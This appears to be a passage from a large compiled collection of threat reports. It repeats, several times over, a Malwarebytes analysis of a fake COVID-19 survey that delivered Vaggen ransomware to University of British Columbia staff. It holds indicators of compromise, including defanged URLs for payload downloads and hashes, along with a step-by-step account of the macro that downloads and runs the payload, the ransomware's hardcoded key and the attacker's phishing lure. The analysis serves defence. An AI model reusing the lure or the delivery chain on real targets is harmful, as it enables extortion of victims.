layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 719 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 720 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 721 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 722 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 723 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 724 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 725 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 726 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 727 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 728 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 729 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 730 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 731 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 732 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 733 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 734 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 735 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 736 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 737 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 738 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 739 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 740 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 741 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 742 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 743 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 744 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 745 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 746 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 747 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 748 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 749 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 750 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 751 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 752 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 753 of 